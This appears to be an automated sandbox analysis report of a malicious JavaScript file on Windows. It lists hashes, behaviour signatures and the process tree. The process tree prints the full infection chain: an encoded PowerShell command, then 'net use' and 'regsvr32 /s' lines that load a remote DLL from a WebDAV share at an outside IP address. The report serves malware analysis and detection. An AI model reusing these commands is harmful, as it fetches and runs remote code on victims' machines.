Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 10:46
Static task
static1
Behavioral task
behavioral1
Sample
1485223624968714276.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
1485223624968714276.js
Resource
win10v2004-20241007-en
General
-
Target
1485223624968714276.js
-
Size
549KB
-
MD5
f6e0d4cbfbf4769f1de51ec2be2eef61
-
SHA1
3a967242ebbae2ddca1694a307b8307b43bafda8
-
SHA256
67295604fb9a0bb79200b9fabfc66eb8e516339686e975a5287644bb21eda8f8
-
SHA512
5a57a71f7577714c33987d6e88ff697f17f51fa2359825f89d820a389a19232b81ec2c8e554500c1e56bc5a2c80d313081a733c90f681b9b3b8a54a11f56487a
-
SSDEEP
3072:qtNeOR4IwX/gei6LbMycM0uXOQgkmZKPk9x3NHYBkBAi5kK7fkJYLMcHYpNnNQMG:qtNeORCgeVb6pga7cORq7cORTORm+
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2172 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2172 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
wscript.exepowershell.exedescription pid process target process PID 3032 wrote to memory of 2172 3032 wscript.exe powershell.exe PID 3032 wrote to memory of 2172 3032 wscript.exe powershell.exe PID 3032 wrote to memory of 2172 3032 wscript.exe powershell.exe PID 2172 wrote to memory of 2480 2172 powershell.exe net.exe PID 2172 wrote to memory of 2480 2172 powershell.exe net.exe PID 2172 wrote to memory of 2480 2172 powershell.exe net.exe PID 2172 wrote to memory of 2824 2172 powershell.exe regsvr32.exe PID 2172 wrote to memory of 2824 2172 powershell.exe regsvr32.exe PID 2172 wrote to memory of 2824 2172 powershell.exe regsvr32.exe PID 2172 wrote to memory of 2824 2172 powershell.exe regsvr32.exe PID 2172 wrote to memory of 2824 2172 powershell.exe regsvr32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1485223624968714276.js1⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA7AHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAMgAyADYAMgA1ADgAMQAzADMANAAwADQALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\94.159.113.79@8888\davwwwroot\3⤵PID:2480
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\94.159.113.79@8888\davwwwroot\21226258133404.dll3⤵PID:2824
-
-